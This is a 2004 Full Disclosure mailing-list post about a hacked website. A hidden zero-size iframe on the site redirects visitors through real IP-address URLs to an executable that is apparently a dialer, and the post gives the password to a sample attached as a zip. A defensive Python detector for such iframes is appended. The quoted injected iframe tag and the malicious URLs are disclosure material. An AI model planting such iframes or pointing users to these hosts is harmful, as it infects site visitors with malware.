Full Disclosure mailing list archives

Possible dialer on 62.4.84.150


From: "Daniel Bartlett" <danbuk_fd () warpmail net>
Date: Tue, 17 Aug 2004 19:47:03 +0100

Hi All,
I've only looked at this for about 3 mins, so there isn't a lot to tell.
From a website that looks like someone has hacked it and added an IFRAME
to the top of the page:
<iframe FRAMEBORDER="0" width="0" height="0"
src="http://213.158.119.103/iframe.php?xid=111"></iframe>
From this frame it gets bounced onto:
http://62.4.84.150/data/start.php?id=111-b&aid=0
then onto:
http://62.4.84.150/data/start.php?id=111-download&aid=0
which then downloads a 17984b exe file.
I've attached a strings output from the exe, and a copy of the
exe (password for zip is lamedial).

I hope someone else can shed more light on this than I can.

Cheers,
Daniel B.
-- 
  Daniel Bartlett
  danbuk_fd () warpmail net

Attachment: lamedial.zip
Description:

Attachment: lamedial-strings.txt
Description:
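
A defender-side check for the pattern described in the message above (a zero-size IFRAME added to a page and pointing at another host), as an added example that is not part of the original post. The function names, the `www.example.org` page host and the sample HTML (which uses the documentation address 192.0.2.10) are constructed for illustration.

```python
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlsplit

def _is_zero(value):
    """True for dimensions such as "0", "0px" or "0%"."""
    digits = (value or "").strip().lower().rstrip("px%")
    return digits.isdigit() and int(digits) == 0

def _is_ip_literal(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False

class HiddenIframeFinder(HTMLParser):
    """Collects zero-size iframes whose src points off the page's own host."""
    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":          # HTMLParser lowercases tag/attribute names
            return
        a = {k: (v or "") for k, v in attrs}
        host = (urlsplit(a.get("src", "")).hostname or "").lower()
        reasons = []
        if _is_zero(a.get("width")) and _is_zero(a.get("height")):
            reasons.append("zero-size")
        if host and host != self.page_host:
            reasons.append("third-party-host")
        if host and _is_ip_literal(host):
            reasons.append("ip-literal-host")
        # Invisible alone is not enough; require an off-site target as well.
        if "zero-size" in reasons and len(reasons) > 1:
            self.findings.append((self.getpos()[0], a["src"], reasons))

def find_hidden_iframes(html, page_host):
    finder = HiddenIframeFinder(page_host)
    finder.feed(html)
    return finder.findings

# Constructed sample page: one injected-style frame, one ordinary embed.
SAMPLE = """<html><body>
<iframe FRAMEBORDER="0" width="0" height="0" src="http://192.0.2.10/iframe.php?xid=1"></iframe>
<iframe width="560" height="315" src="https://video.example.net/embed/1"></iframe>
<h1>Welcome</h1></body></html>"""

if __name__ == "__main__":
    for line, src, reasons in find_hidden_iframes(SAMPLE, "www.example.org"):
        print(f"line {line}: {src} [{', '.join(reasons)}]")
```
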

